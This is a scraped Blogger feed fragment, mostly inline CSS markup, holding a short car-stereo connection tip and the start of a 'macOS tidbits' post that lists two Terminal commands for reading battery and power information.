652px;"></div></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p style="text-align: left;"><span color="var(--bbQxAb)" face=""Google Sans", Roboto, arial, sans-serif" style="background-color: white; font-size: 16px;">To connect, just</span><span color="var(--bbQxAb)" face=""Google Sans", Roboto, arial, sans-serif" style="background-color: white; font-size: 16px;"> </span><span face=""Google Sans", Roboto, arial, sans-serif" style="background-color: rgba(80, 151, 255, 0.18); color: #040c28; font-size: 16px;">open the EasyConnection app on your Xtrons car stereo and on your smartphone simultaneously</span><span color="var(--bbQxAb)" face=""Google Sans", Roboto, arial, sans-serif" style="background-color: white; font-size: 16px;">. Then, on your car stereo, choose how you'd like to connect your smartphone and voila! This works the same for music.</span> </p></blockquote><p> </p>WrightRockethttp://www.blogger.com/profile/04897154139709428821noreply@blogger.com0tag:blogger.com,1999:blog-9173305322166784343.post-88211582322396326012024-01-28T15:14:00.000-08:002024-01-31T00:46:18.788-08:00<h2 style="text-align: left;"> macOS tidbits</h2><p><br /></p><h3 style="text-align: left;">Power usage</h3><div>Commands to run in Terminal app:</div><div><br /></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p><code style="--theme-background-attachment: auto; --theme-background-color: #F1F2F3; --theme-background-position: top left; --theme-background-repeat: repeat; --theme-background-size: auto; --theme-base-primary-color-h: 201.30841121; --theme-base-primary-color-l: 41.96078431%; --theme-base-primary-color-s: 100%; --theme-body-font-color: var(--black-600); --theme-body-font-family: var(--ff-sans); --theme-button-active-background-color: var(--theme-primary-200); --theme-button-color: var(--theme-primary); --theme-button-hover-background-color: var(--theme-primary-100); --theme-button-hover-color: var(--theme-primary-400); --theme-button-outlined-border-color: var(--theme-primary-400); --theme-button-outlined-selected-border-color: var(--theme-primary-500); --theme-button-primary-active-background-color: var(--theme-primary-600); --theme-button-primary-active-color: var(--white); --theme-button-primary-background-color: var(--theme-primary-400); --theme-button-primary-color: var(--white); --theme-button-primary-hover-background-color: var(--theme-primary-500); --theme-button-primary-hover-color: var(--white); --theme-button-primary-selected-background-color: var(--theme-primary-600); --theme-button-primary-selected-color: var(--white); --theme-button-selected-background-color: var(--theme-primary-300); --theme-button-selected-color: var(--theme-primary-600); --theme-content-background-color: var(--white); --theme-content-border-color: var(--black-225); --theme-footer-background-border-top: 0; --theme-footer-background-color: transparent; --theme-footer-background-position: top left; --theme-footer-background-repeat: no-repeat; --theme-footer-background-size: auto; --theme-footer-divider-color: hsl(210,8%,85%); --theme-footer-link-caret-color: hsl(0,0%,100%); --theme-footer-link-color-active: hsl(210,8%,5%); --theme-footer-link-color-hover: hsl(210,8%,5%); --theme-footer-link-color: hsl(210,8%,25%); --theme-footer-padding-bottom: 0; --theme-footer-padding-top: 0; --theme-footer-text-color: hsl(210,8%,42%); --theme-footer-title-color: hsl(0,0%,0%); --theme-header-background-border-bottom: 0; --theme-header-background-color: transparent; --theme-header-background-position: left top; --theme-header-background-repeat: repeat-x; --theme-header-background-size: auto; --theme-header-foreground-color: transparent; --theme-header-foreground-position: bottom right; --theme-header-foreground-repeat: no-repeat; --theme-header-foreground-size: auto; --theme-header-link-color: var(--theme-primary); --theme-header-sponsored-color: hsla(0,0%,0%,0.6); --theme-link-color-hover: #0aa8ff; --theme-link-color-visited: rgba(0,138,214,0.8); --theme-link-color: #008AD6; --theme-post-body-font-family: var(--ff-sans); --theme-post-owner-background-color: var(--theme-primary-100); --theme-post-owner-new-background-color: var(--theme-primary-200); --theme-post-title-color-hover: var(--theme-link-color-hover); --theme-post-title-color-visited: var(--theme-link-color-visited); --theme-post-title-color: var(--theme-link-color); --theme-post-title-font-family: var(--ff-sans); --theme-primary-custom-100: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .9))); --theme-primary-custom-200: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .75))); --theme-primary-custom-300: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .5))); --theme-primary-custom-400: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), var(--theme-base-primary-color-l)); --theme-primary-custom-500: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.3))); --theme-primary-custom-600: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.6))); --theme-primary-custom: var(--theme-primary-custom-400); --theme-tag-background-color: var(--theme-secondary-100); --theme-tag-border-color: transparent; --theme-tag-color: var(--theme-secondary-500); --theme-tag-hover-background-color: var(--theme-secondary-200); --theme-tag-hover-border-color: transparent; --theme-tag-hover-color: var(--theme-secondary-600); --theme-tag-required-background-color: var(--theme-secondary-500); --theme-tag-required-border-color: transparent; --theme-tag-required-color: var(--white); --theme-tag-required-hover-background-color: var(--theme-secondary-400); --theme-tag-required-hover-border-color: transparent; --theme-tag-required-hover-color: var(--white); --theme-topbar-bottom-border: none; border-radius: var(--br-sm); border: 0px; box-sizing: inherit; color: #0c0d0e; font-family: var(--ff-mono); font-feature-settings: inherit; font-kerning: inherit; font-optical-sizing: inherit; font-size: var(--_pr-code-fs); font-stretch: inherit; font-variant-alternates: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; font-variant-position: inherit; font-variation-settings: inherit; line-height: inherit; margin: 0px; padding: var(--su2) var(--su4); vertical-align: baseline; white-space-collapse: preserve;">system_profiler SPPowerDataType</code><span face="-apple-system, "system-ui", "Segoe UI Adjusted", "Segoe UI", "Liberation Sans", sans-serif" style="background-color: white; color: #0c0d0e; font-size: 15px;"> </span></p><pre class="lang-bash s-code-block" style="--_cb-line-numbers-bg: var(--black-150); --theme-background-attachment: auto; --theme-background-color: #F1F2F3; --theme-background-position: top left; --theme-background-repeat: repeat; --theme-background-size: auto; --theme-base-primary-color-h: 201.30841121; --theme-base-primary-color-l: 41.96078431%; --theme-base-primary-color-s: 100%; --theme-body-font-color: var(--black-600); --theme-body-font-family: var(--ff-sans); --theme-button-active-background-color: var(--theme-primary-200); --theme-button-color: var(--theme-primary); --theme-button-hover-background-color: var(--theme-primary-100); --theme-button-hover-color: var(--theme-primary-400); --theme-button-outlined-border-color: var(--theme-primary-400); --theme-button-outlined-selected-border-color: var(--theme-primary-500); --theme-button-primary-active-background-color: var(--theme-primary-600); --theme-button-primary-active-color: var(--white); --theme-button-primary-background-color: var(--theme-primary-400); --theme-button-primary-color: var(--white); --theme-button-primary-hover-background-color: var(--theme-primary-500); --theme-button-primary-hover-color: var(--white); --theme-button-primary-selected-background-color: var(--theme-primary-600); --theme-button-primary-selected-color: var(--white); --theme-button-selected-background-color: var(--theme-primary-300); --theme-button-selected-color: var(--theme-primary-600); --theme-content-background-color: var(--white); --theme-content-border-color: var(--black-225); --theme-footer-background-border-top: 0; --theme-footer-background-color: transparent; --theme-footer-background-position: top left; --theme-footer-background-repeat: no-repeat; --theme-footer-background-size: auto; --theme-footer-divider-color: hsl(210,8%,85%); --theme-footer-link-caret-color: hsl(0,0%,100%); --theme-footer-link-color-active: hsl(210,8%,5%); --theme-footer-link-color-hover: hsl(210,8%,5%); --theme-footer-link-color: hsl(210,8%,25%); --theme-footer-padding-bottom: 0; --theme-footer-padding-top: 0; --theme-footer-text-color: hsl(210,8%,42%); --theme-footer-title-color: hsl(0,0%,0%); --theme-header-background-border-bottom: 0; --theme-header-background-color: transparent; --theme-header-background-position: left top; --theme-header-background-repeat: repeat-x; --theme-header-background-size: auto; --theme-header-foreground-color: transparent; --theme-header-foreground-position: bottom right; --theme-header-foreground-repeat: no-repeat; --theme-header-foreground-size: auto; --theme-header-link-color: var(--theme-primary); --theme-header-sponsored-color: hsla(0,0%,0%,0.6); --theme-link-color-hover: #0aa8ff; --theme-link-color-visited: rgba(0,138,214,0.8); --theme-link-color: #008AD6; --theme-post-body-font-family: var(--ff-sans); --theme-post-owner-background-color: var(--theme-primary-100); --theme-post-owner-new-background-color: var(--theme-primary-200); --theme-post-title-color-hover: var(--theme-link-color-hover); --theme-post-title-color-visited: var(--theme-link-color-visited); --theme-post-title-color: var(--theme-link-color); --theme-post-title-font-family: var(--ff-sans); --theme-primary-custom-100: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .9))); --theme-primary-custom-200: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .75))); --theme-primary-custom-300: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .5))); --theme-primary-custom-400: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), var(--theme-base-primary-color-l)); --theme-primary-custom-500: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.3))); --theme-primary-custom-600: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.6))); --theme-primary-custom: var(--theme-primary-custom-400); --theme-tag-background-color: var(--theme-secondary-100); --theme-tag-border-color: transparent; --theme-tag-color: var(--theme-secondary-500); --theme-tag-hover-background-color: var(--theme-secondary-200); --theme-tag-hover-border-color: transparent; --theme-tag-hover-color: var(--theme-secondary-600); --theme-tag-required-background-color: var(--theme-secondary-500); --theme-tag-required-border-color: transparent; --theme-tag-required-color: var(--white); --theme-tag-required-hover-background-color: var(--theme-secondary-400); --theme-tag-required-hover-border-color: transparent; --theme-tag-required-hover-color: var(--white); --theme-topbar-bottom-border: none; border-radius: var(--br-md); border: 0px; box-sizing: inherit; color: #0c0d0e; font-family: var(--ff-mono); font-feature-settings: inherit; font-kerning: inherit; font-optical-sizing: inherit; font-size: var(--fs-body1); font-stretch: inherit; font-variant-alternates: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; font-variant-position: inherit; font-variation-settings: inherit; line-height: var(--lh-md); margin-bottom: 0px; margin-top: 0px; max-height: 600px; overflow-wrap: normal; overflow: auto; padding: var(--su12); vertical-align: baseline; width: auto;"><code class="hljs language-bash" style="--theme-background-attachment: auto; --theme-background-color: #F1F2F3; --theme-background-position: top left; --theme-background-repeat: repeat; --theme-background-size: auto; --theme-base-primary-color-h: 201.30841121; --theme-base-primary-color-l: 41.96078431%; --theme-base-primary-color-s: 100%; --theme-body-font-color: var(--black-600); --theme-body-font-family: var(--ff-sans); --theme-button-active-background-color: var(--theme-primary-200); --theme-button-color: var(--theme-primary); --theme-button-hover-background-color: var(--theme-primary-100); --theme-button-hover-color: var(--theme-primary-400); --theme-button-outlined-border-color: var(--theme-primary-400); --theme-button-outlined-selected-border-color: var(--theme-primary-500); --theme-button-primary-active-background-color: var(--theme-primary-600); --theme-button-primary-active-color: var(--white); --theme-button-primary-background-color: var(--theme-primary-400); --theme-button-primary-color: var(--white); --theme-button-primary-hover-background-color: var(--theme-primary-500); --theme-button-primary-hover-color: var(--white); --theme-button-primary-selected-background-color: var(--theme-primary-600); --theme-button-primary-selected-color: var(--white); --theme-button-selected-background-color: var(--theme-primary-300); --theme-button-selected-color: var(--theme-primary-600); --theme-content-background-color: var(--white); --theme-content-border-color: var(--black-225); --theme-footer-background-border-top: 0; --theme-footer-background-color: transparent; --theme-footer-background-position: top left; --theme-footer-background-repeat: no-repeat; --theme-footer-background-size: auto; --theme-footer-divider-color: hsl(210,8%,85%); --theme-footer-link-caret-color: hsl(0,0%,100%); --theme-footer-link-color-active: hsl(210,8%,5%); --theme-footer-link-color-hover: hsl(210,8%,5%); --theme-footer-link-color: hsl(210,8%,25%); --theme-footer-padding-bottom: 0; --theme-footer-padding-top: 0; --theme-footer-text-color: hsl(210,8%,42%); --theme-footer-title-color: hsl(0,0%,0%); --theme-header-background-border-bottom: 0; --theme-header-background-color: transparent; --theme-header-background-position: left top; --theme-header-background-repeat: repeat-x; --theme-header-background-size: auto; --theme-header-foreground-color: transparent; --theme-header-foreground-position: bottom right; --theme-header-foreground-repeat: no-repeat; --theme-header-foreground-size: auto; --theme-header-link-color: var(--theme-primary); --theme-header-sponsored-color: hsla(0,0%,0%,0.6); --theme-link-color-hover: #0aa8ff; --theme-link-color-visited: rgba(0,138,214,0.8); --theme-link-color: #008AD6; --theme-post-body-font-family: var(--ff-sans); --theme-post-owner-background-color: var(--theme-primary-100); --theme-post-owner-new-background-color: var(--theme-primary-200); --theme-post-title-color-hover: var(--theme-link-color-hover); --theme-post-title-color-visited: var(--theme-link-color-visited); --theme-post-title-color: var(--theme-link-color); --theme-post-title-font-family: var(--ff-sans); --theme-primary-custom-100: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .9))); --theme-primary-custom-200: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .75))); --theme-primary-custom-300: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .5))); --theme-primary-custom-400: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), var(--theme-base-primary-color-l)); --theme-primary-custom-500: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.3))); --theme-primary-custom-600: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.6))); --theme-primary-custom: var(--theme-primary-custom-400); --theme-tag-background-color: var(--theme-secondary-100); --theme-tag-border-color: transparent; --theme-tag-color: var(--theme-secondary-500); --theme-tag-hover-background-color: var(--theme-secondary-200); --theme-tag-hover-border-color: transparent; --theme-tag-hover-color: var(--theme-secondary-600); --theme-tag-required-background-color: var(--theme-secondary-500); --theme-tag-required-border-color: transparent; --theme-tag-required-color: var(--white); --theme-tag-required-hover-background-color: var(--theme-secondary-400); --theme-tag-required-hover-border-color: transparent; --theme-tag-required-hover-color: var(--white); --theme-topbar-bottom-border: none; border: 0px; box-sizing: inherit; font-family: inherit; font-feature-settings: inherit; font-kerning: inherit; font-optical-sizing: inherit; font-size: var(--_pr-code-fs); font-stretch: inherit; font-style: inherit; font-variant: inherit; font-variation-settings: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline; white-space: inherit;">ioreg -w 0 -f -r -c AppleSmartBattery</code></pre></blockquote><pre class="lang-bash s-code-block" style="--_cb-line-numbers-bg: var(--black-150); --theme-background-attachment: auto; --theme-background-color: #F1F2F3; --theme-background-position: top left; --theme-background-repeat: repeat; --theme-background-size: auto; --theme-base-primary-color-h: 201.30841121; --theme-base-primary-color-l: 41.96078431%; --theme-base-primary-color-s: 100%; --theme-body-font-color: var(--black-600); --theme-body-font-family: var(--ff-sans); --theme-button-active-background-color: var(--theme-primary-200); --theme-button-color: var(--theme-primary); --theme-button-hover-background-color: var(--theme-primary-100); --theme-button-hover-color: var(--theme-primary-400); --theme-button-outlined-border-color: var(--theme-primary-400); --theme-button-outlined-selected-border-color: var(--theme-primary-500); --theme-button-primary-active-background-color: var(--theme-primary-600); --theme-button-primary-active-color: var(--white); --theme-button-primary-background-color: var(--theme-primary-400); --theme-button-primary-color: var(--white); --theme-button-primary-hover-background-color: var(--theme-primary-500); --theme-button-primary-hover-color: var(--white); --theme-button-primary-selected-background-color: var(--theme-primary-600); --theme-button-primary-selected-color: var(--white); --theme-button-selected-background-color: var(--theme-primary-300); --theme-button-selected-color: var(--theme-primary-600); --theme-content-background-color: var(--white); --theme-content-border-color: var(--black-225); --theme-footer-background-border-top: 0; --theme-footer-background-color: transparent; --theme-footer-background-position: top left; --theme-footer-background-repeat: no-repeat; --theme-footer-background-size: auto; --theme-footer-divider-color: hsl(210,8%,85%); --theme-footer-link-caret-color: hsl(0,0%,100%); --theme-footer-link-color-active: hsl(210,8%,5%); --theme-footer-link-color-hover: hsl(210,8%,5%); --theme-footer-link-color: hsl(210,8%,25%); --theme-footer-padding-bottom: 0; --theme-footer-padding-top: 0; --theme-footer-text-color: hsl(210,8%,42%); --theme-footer-title-color: hsl(0,0%,0%); --theme-header-background-border-bottom: 0; --theme-header-background-color: transparent; --theme-header-background-position: left top; --theme-header-background-repeat: repeat-x; --theme-header-background-size: auto; --theme-header-foreground-color: transparent; --theme-header-foreground-position: bottom right; --theme-header-foreground-repeat: no-repeat; --theme-header-foreground-size: auto; --theme-header-link-color: var(--theme-primary); --theme-header-sponsored-color: hsla(0,0%,0%,0.6); --theme-link-color-hover: #0aa8ff; --theme-link-color-visited: rgba(0,138,214,0.8); --theme-link-color: #008AD6; --theme-post-body-font-family: var(--ff-sans); --theme-post-owner-background-color: var(--theme-primary-100); --theme-post-owner-new-background-color: var(--theme-primary-200); --theme-post-title-color-hover: var(--theme-link-color-hover); --theme-post-title-color-visited: var(--theme-link-color-visited); --theme-post-title-color: var(--theme-link-color); --theme-post-title-font-family: var(--ff-sans); --theme-primary-custom-100: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .9))); --theme-primary-custom-200: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .75))); --theme-primary-custom-300: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .5))); --theme-primary-custom-400: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), var(--theme-base-primary-color-l)); --theme-primary-custom-500: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.3))); --theme-primary-custom-600: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.6))); --theme-primary-custom: var(--theme-primary-custom-400); --theme-tag-background-color: var(--theme-secondary-100); --theme-tag-border-color: transparent; --theme-tag-color: var(--theme-secondary-500); --theme-tag-hover-background-color: var(--theme-secondary-200); --theme-tag-hover-border-color: transparent; --theme-tag-hover-color: var(--theme-secondary-600); --theme-tag-required-background-color: var(--theme-secondary-500); --theme-tag-required-border-color: transparent; --theme-tag-required-color: var(--white); --theme-tag-required-hover-background-color: var(--theme-secondary-400); --theme-tag-required-hover-border-color: transparent; --theme-tag-required-hover-color: var(--white); --theme-topbar-bottom-border: none; border-radius: var(--br-md); border: 0px; box-sizing: inherit; color: #0c0d0e; font-family: var(--ff-mono); font-feature-settings: inherit; font-kerning: inherit; font-optical-sizing: inherit; font-size: var(--fs-body1); font-stretch: inherit; font-variant-alternates: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; font-variant-position: inherit; font-variation-settings: inherit; line-height: var(--lh-md); margin-bottom: 0px; margin-top: 0px; max-height: 600px; overflow-wrap: normal; overflow: auto; padding: var(--su12); vertical-align: baseline; width: auto;"><code class="hljs language-bash" style="--theme-background-attachment: auto; --theme-background-color: #F1F2F3; --theme-background-position: top left; --theme-background-repeat: repeat; --theme-background-size: auto; --theme-base-primary-color-h: 201.30841121; --theme-base-primary-color-l: 41.96078431%; --theme-base-primary-color-s: 100%; --theme-body-font-color: var(--black-600); --theme-body-font-family: var(--ff-sans); --theme-button-active-background-color: var(--theme-primary-200); --theme-button-color: var(--theme-primary); --theme-button-hover-background-color: var(--theme-primary-100); --theme-button-hover-color: var(--theme-primary-400); --theme-button-outlined-border-color: var(--theme-primary-400); --theme-button-outlined-selected-border-color: var(--theme-primary-500); --theme-button-primary-active-background-color: var(--theme-primary-600); --theme-button-primary-active-color: var(--white); --theme-button-primary-background-color: var(--theme-primary-400); --theme-button-primary-color: var(--white); --theme-button-primary-hover-background-color: var(--theme-primary-500); --theme-button-primary-hover-color: var(--white); --theme-button-primary-selected-background-color: var(--theme-primary-600); --theme-button-primary-selected-color: var(--white); --theme-button-selected-background-color: var(--theme-primary-300); --theme-button-selected-color: var(--theme-primary-600); --theme-content-background-color: var(--white); --theme-content-border-color: var(--black-225); --theme-footer-background-border-top: 0; --theme-footer-background-color: transparent; --theme-footer-background-position: top left; --theme-footer-background-repeat: no-repeat; --theme-footer-background-size: auto; --theme-footer-divider-color: hsl(210,8%,85%); --theme-footer-link-caret-color: hsl(0,0%,100%); --theme-footer-link-color-active: hsl(210,8%,5%); --theme-footer-link-color-hover: hsl(210,8%,5%); --theme-footer-link-color: hsl(210,8%,25%); --theme-footer-padding-bottom: 0; --theme-footer-padding-top: 0; --theme-footer-text-color: hsl(210,8%,42%); --theme-footer-title-color: hsl(0,0%,0%); --theme-header-background-border-bottom: 0; --theme-header-background-color: transparent; --theme-header-background-position: left top; --theme-header-background-repeat: repeat-x; --theme-header-background-size: auto; --theme-header-foreground-color: transparent; --theme-header-foreground-position: bottom right; --theme-header-foreground-repeat: no-repeat; --theme-header-foreground-size: auto; --theme-header-link-color: var(--theme-primary); --theme-header-sponsored-color: hsla(0,0%,0%,0.6); --theme-link-color-hover: #0aa8ff; --theme-link-color-visited: rgba(0,138,214,0.8); --theme-link-color: #008AD6; --theme-post-body-font-family: var(--ff-sans); --theme-post-owner-background-color: var(--theme-primary-100); --theme-post-owner-new-background-color: var(--theme-primary-200); --theme-post-title-color-hover: var(--theme-link-color-hover); --theme-post-title-color-visited: var(--theme-link-color-visited); --theme-post-title-color: var(--theme-link-color); --theme-post-title-font-family: var(--ff-sans); --theme-primary-custom-100: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .9))); --theme-primary-custom-200: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .75))); --theme-primary-custom-300: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .5))); --theme-primary-custom-400: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), var(--theme-base-primary-color-l)); --theme-primary-custom-500: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.3))); --theme-primary-custom-600: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.6))); --theme-primary-custom: var(--theme-primary-custom-400); --theme-tag-background-color: var(--theme-secondary-100); --theme-tag-border-color: transparent; --theme-tag-color: var(--theme-secondary-500); --theme-tag-hover-background-color: var(--theme-secondary-200); --theme-tag-hover-border-color: transparent; --theme-tag-hover-color: var(--theme-secondary-600); --theme-tag-required-background-color: var(--theme-secondary-500); --theme-tag-required-border-color: transparent; --theme-tag-required-color: var(--white); --theme-tag-required-hover-background-color: var(--theme-secondary-400); --theme-tag-required-hover-border-color: transparent; --theme-tag-required-hover-color: var(--white); --theme-topbar-bottom-border: none; border: 0px; box-sizing: inherit; font-family: inherit; font-feature-settings: inherit; font-kerning: inherit; font-optical-sizing: inherit; font-size: var(--_pr-code-fs); font-stretch: inherit; font-style: inherit; font-variant: inherit; font-variation-settings: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline; white-space: inherit;"><br /></code></pre><pre class="lang-bash s-code-block" style="--_cb-line-numbers-bg: var(--black-150); --theme-background-attachment: auto; --theme-background-color: #F1F2F3; --theme-background-position: top left; --theme-background-repeat: repeat; --theme-background-size: auto; --theme-base-primary-color-h: 201.30841121; --theme-base-primary-color-l: 41.96078431%; --theme-base-primary-color-s: 100%; --theme-body-font-color: var(--black-600); --theme-body-font-family: var(--ff-sans); --theme-button-active-background-color: var(--theme-primary-200); --theme-button-color: var(--theme-primary); --theme-button-hover-background-color: var(--theme-primary-100); --theme-button-hover-color: var(--theme-primary-400); --theme-button-outlined-border-color: var(--theme-primary-400); --theme-button-outlined-selected-border-color: var(--theme-primary-500); --theme-button-primary-active-background-color: var(--theme-primary-600); --theme-button-primary-active-color: var(--white); --theme-button-primary-background-color: var(--theme-primary-400); --theme-button-primary-color: var(--white); --theme-button-primary-hover-background-color: var(--theme-primary-500); --theme-button-primary-hover-color: var(--white); --theme-button-primary-selected-background-color: var(--theme-primary-600); --theme-button-primary-selected-color: var(--white); --theme-button-selected-background-color: var(--theme-primary-300); --theme-button-selected-color: var(--theme-primary-600); --theme-content-background-color: var(--white); --theme-content-border-color: var(--black-225); --theme-footer-background-border-top: 0; --theme-footer-background-color: transparent; --theme-footer-background-position: top left; --theme-footer-background-repeat: no-repeat; --theme-footer-background-size: auto; --theme-footer-divider-color: hsl(210,8%,85%); --theme-footer-link-caret-color: hsl(0,0%,100%); --theme-footer-link-color-active: hsl(210,8%,5%); --theme-footer-link-color-hover: hsl(210,8%,5%); --theme-footer-link-color: hsl(210,8%,25%); --theme-footer-padding-bottom: 0; --theme-footer-padding-top: 0; --theme-footer-text-color: hsl(210,8%,42%); --theme-footer-title-color: hsl(0,0%,0%); --theme-header-background-border-bottom: 0; --theme-header-background-color: transparent; --theme-header-background-position: left top; --theme-header-background-repeat: repeat-x; --theme-header-background-size: auto; --theme-header-foreground-color: transparent; --theme-header-foreground-position: bottom right; --theme-header-foreground-repeat: no-repeat; --theme-header-foreground-size: auto; --theme-header-link-color: var(--theme-primary); --theme-header-sponsored-color: hsla(0,0%,0%,0.6); --theme-link-color-hover: #0aa8ff; --theme-link-color-visited: rgba(0,138,214,0.8); --theme-link-color: #008AD6; --theme-post-body-font-family: var(--ff-sans); --theme-post-owner-background-color: var(--theme-primary-100); --theme-post-owner-new-background-color: var(--theme-primary-200); --theme-post-title-color-hover: var(--theme-link-color-hover); --theme-post-title-color-visited: var(--theme-link-color-visited); --theme-post-title-color: var(--theme-link-color); --theme-post-title-font-family: var(--ff-sans); --theme-primary-custom-100: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .9))); --theme-primary-custom-200: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .75))); --theme-primary-custom-300: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + ((100% - var(--theme-base-primary-color-l)) * .5))); --theme-primary-custom-400: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), var(--theme-base-primary-color-l)); --theme-primary-custom-500: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.3))); --theme-primary-custom-600: hsl(var(--theme-base-primary-color-h), var(--theme-base-primary-color-s), calc(var(--theme-base-primary-color-l) + (var(--theme-base-primary-color-l) * -.6))); --theme-primary-custom: var(--theme-primary-custom-400); --theme-tag-background-color: var(--theme-secondary-100); --theme-tag-border-color: transparent; --theme-tag-color: var(--theme-secondary-500); --theme-tag-hover-background-color: var(--theme-secondary-200); --theme-tag-hover-border-color: transparent; --theme-tag-hover-color: var(--theme-secondary-600); --theme-tag-required-background-color: var(--theme-secondary-500); --theme-tag-required-border-color: transparent; --theme-tag-required-color: var(--white); --theme-tag-required-hover-background-color: var(--theme-secondary-400); --theme-tag-required-hover-border-color: transparent; --theme-tag-required-hover-color: var(--white); --theme-topbar-bottom-border: none; border-radius: var(--br-md); border: 0px; box-sizing: inherit; color: #0c0d0e; font-family: var(--ff-mono); font-feature-settings: inherit; font-kerning: inherit; font-optical-sizing: inherit; font-size: var(--fs-body1); font-stretch: inherit; font-variant-alternates: inherit; font-variant-east-asian: inherit; font-variant-numeric: inherit; font-variant-position: inherit; font-variation-settings: inherit; line-height: var(--lh-md); margin-bottom: 0px; margin-top: 0px; max-height: 600px; overflow-wrap: normal; overflow: auto; padding: var(--su12); vertical-align: baseline; width: auto;"><code class="hljs language-bash" style="--theme-background-attachment: auto; --theme-background-color: #F1F2F3; --theme-background-position: top left; --theme-background-repeat: repeat; --theme-background-size: auto; --theme-base-primary-color-h: 201.30841121; --theme-base-primary-color-l: 41.96078431%; --theme-base-primary-color-s: 100%; --theme-body-font-color: var(--black-600); --theme-body-font-family: var(--ff-sans); --theme-button-active-background-color: var(--theme-primary-200); --theme-button-color: var(--theme-primary); --theme-button-hover-background-color: var(--theme-primary-100); --theme-button-hover-color: var(--theme-primary-400); --theme-button-outlined-border-color: var(--theme-primary-400); --theme-button-outlined-selected-border-color: var(--theme-primary-500); --theme-button-primary-active-background-color: var(--theme-primary-600); --theme-button-primary-active-color: var(--white); --theme-button-primary-background-color: var(--theme-primary-400); --theme-button-primary-color: var(--white); --theme-button-primary-hover-background-color: var(--theme-primary-500); --theme-button-primary-hover-color: var(--white); --theme-button-primary-selected-background-color: var(--theme-primary-600); --theme-button-primary-selected-color: var(--white); --theme-button-selected-background-color: 